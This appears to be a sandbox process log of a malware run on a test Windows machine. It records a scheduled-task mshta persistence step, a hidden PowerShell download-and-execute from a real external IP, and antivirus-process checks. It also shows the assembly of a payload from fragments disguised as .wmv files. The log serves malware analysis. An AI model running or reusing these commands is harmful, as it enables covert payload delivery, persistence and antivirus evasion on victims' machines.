cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
2600schtasks.exe schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
2704powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
2808TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE "C:\Users\test22\AppData\Local\TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE"
3004ZqkKpwG.exe "C:\Users\test22\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
2632tasklist.exe tasklist
3024findstr.exe findstr /I "opssvc wrsa"
2960tasklist.exe tasklist
812findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
2084cmd.exe cmd /c md 440824
2204extrac32.exe extrac32 /Y /E Architecture.wmv
1508findstr.exe findstr /V "Offensive" Inter
2588cmd.exe cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
2304cmd.exe cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
1316advnrNo.exe "C:\Users\test22\AppData\Local\Temp\10287840101\advnrNo.exe"
560explorer.exe C:\Windows\Explorer.EXE
1452